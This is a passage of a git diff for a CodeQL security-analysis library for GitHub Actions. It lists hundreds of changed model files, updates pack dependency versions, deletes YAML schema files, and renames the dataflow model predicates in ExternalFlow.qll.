.../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 +- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 +- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 +- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 +- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../huggingface_doc-builder.model.yml | 2 +- .../huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../kairos-io_kairos.model.yml | 2 +- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../reusable-workflows/kiali_kiali.model.yml | 2 +- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 2 +- .../labring_sealos.model.yml | 2 +- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 2 +- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 2 +- .../reusable-workflows/llvm_circt.model.yml | 2 +- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- ...anticoresoftware_manticoresearch.model.yml | 2 +- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 2 +- .../matter-labs_zksync-era.model.yml | 2 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 2 +- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 2 +- .../meshtastic_firmware.model.yml | 2 +- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 2 +- .../microsoft_msquic.model.yml | 2 +- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 2 +- .../reusable-workflows/moby_moby.model.yml | 2 +- .../mosaicml_composer.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mudler_localai.model.yml | 2 +- .../mustardchef_wsabuilds.model.yml | 2 +- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 2 +- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../newrelic_node-newrelic.model.yml | 2 +- .../nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../nocodb_nocodb.model.yml | 2 +- .../reusable-workflows/novuhq_novu.model.yml | 2 +- .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 2 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 2 +- .../open-goal_jak-project.model.yml | 2 +- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 2 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...entelemetry-java-instrumentation.model.yml | 2 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 2 +- .../openbao_openbao.model.yml | 2 +- .../openhab_openhab-docs.model.yml | 2 +- .../openmined_pysyft.model.yml | 2 +- .../opentofu_opentofu.model.yml | 2 +- .../openttd_openttd.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 2 +- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 2 +- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 2 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 2 +- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 2 +- .../preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 2 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 2 +- .../puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 2 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 2 +- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 2 +- .../saadeghi_daisyui.model.yml | 2 +- .../sagemath_sage.model.yml | 2 +- .../schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 2 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 2 +- .../speedb-io_speedb.model.yml | 2 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 2 +- .../stdlib-js_stdlib.model.yml | 2 +- .../stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 4 +- .../tgstation_tgstation.model.yml | 2 +- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 2 +- .../tiledb-inc_tiledb.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 2 +- .../uyuni-project_uyuni.model.yml | 2 +- .../vert-x3_vertx-hazelcast.model.yml | 2 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../reusable-workflows/werf_werf.model.yml | 2 +- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 2 +- .../yt-dlp_yt-dlp.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 4 +- ql/lib/ext/getsentry_action-release.model.yml | 2 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 2 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 2 +- .../ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 2 +- .../ext/jitterbit_get-changed-files.model.yml | 2 +- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- .../ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 +- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 +- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- .../ext/renovatebot_github-action.model.yml | 2 +- .../ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 +- ...ction-detect-and-tag-new-version.model.yml | 4 +- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- .../ext/stackhawk_hawkscan-action.model.yml | 2 +- .../ext/step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- .../ext/trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- .../ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.gbo | 13 --- ql/lib/qlpack.yml | 15 ++-- ql/lib/yaml.dbscheme | 80 ------------------- ql/lib/yaml.dbscheme.stats | 4 - ql/src/codeql-pack.lock.yml | 6 ++ ql/src/qlpack.yml | 7 +- ql/test/codeql-pack.lock.yml | 6 ++ ql/test/library-tests/test.ql | 4 +- ql/test/qlpack.yml | 6 +- 755 files changed, 819 insertions(+), 898 deletions(-) create mode 100644 .!79690!.DS_Store delete mode 100644 ql/lib/qlpack.gbo delete mode 100644 ql/lib/yaml.dbscheme delete mode 100644 ql/lib/yaml.dbscheme.stats diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26d..c060ce97430 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 0.1.16 codeql/dataflow: - version: 0.1.8 + version: 0.2.7 + codeql/javascript-all: + version: 0.9.1 + codeql/mad: + version: 0.2.16 + codeql/regex: + version: 0.2.16 codeql/ssa: - version: 0.2.8 + version: 0.2.16 + codeql/tutorial: + version: 0.2.16 codeql/typetracking: - version: 0.2.8 + version: 0.2.16 codeql/util: - version: 0.2.8 + version: 0.2.16 + codeql/xml: + version: 0.0.3 codeql/yaml: - version: 0.1.5 + version: 0.2.16 compiled: false diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c46a3ee64a1..d0b84f918d5 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -55,8 +55,8 @@ predicate externallyTriggerableEventsDataModel(string event) { * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind, string provenance) { - Extensions::sourceModel(action, version, output, kind, provenance) +predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::actionsSourceModel(action, version, output, kind, provenance) } /** @@ -69,10 +69,10 @@ predicate sourceModel(string action, string version, string output, string kind, * - kind: Either 'Taint' or 'Value' * - provenance: verification of the model */ -predicate summaryModel( +predicate actionsSummaryModel( string action, string version, string input, string output, string kind, string provenance ) { - Extensions::summaryModel(action, version, input, output, kind, provenance) + Extensions::actionsSummaryModel(action, version, input, output, kind, provenance) } /** @@ -84,13 +84,13 @@ predicate summaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string 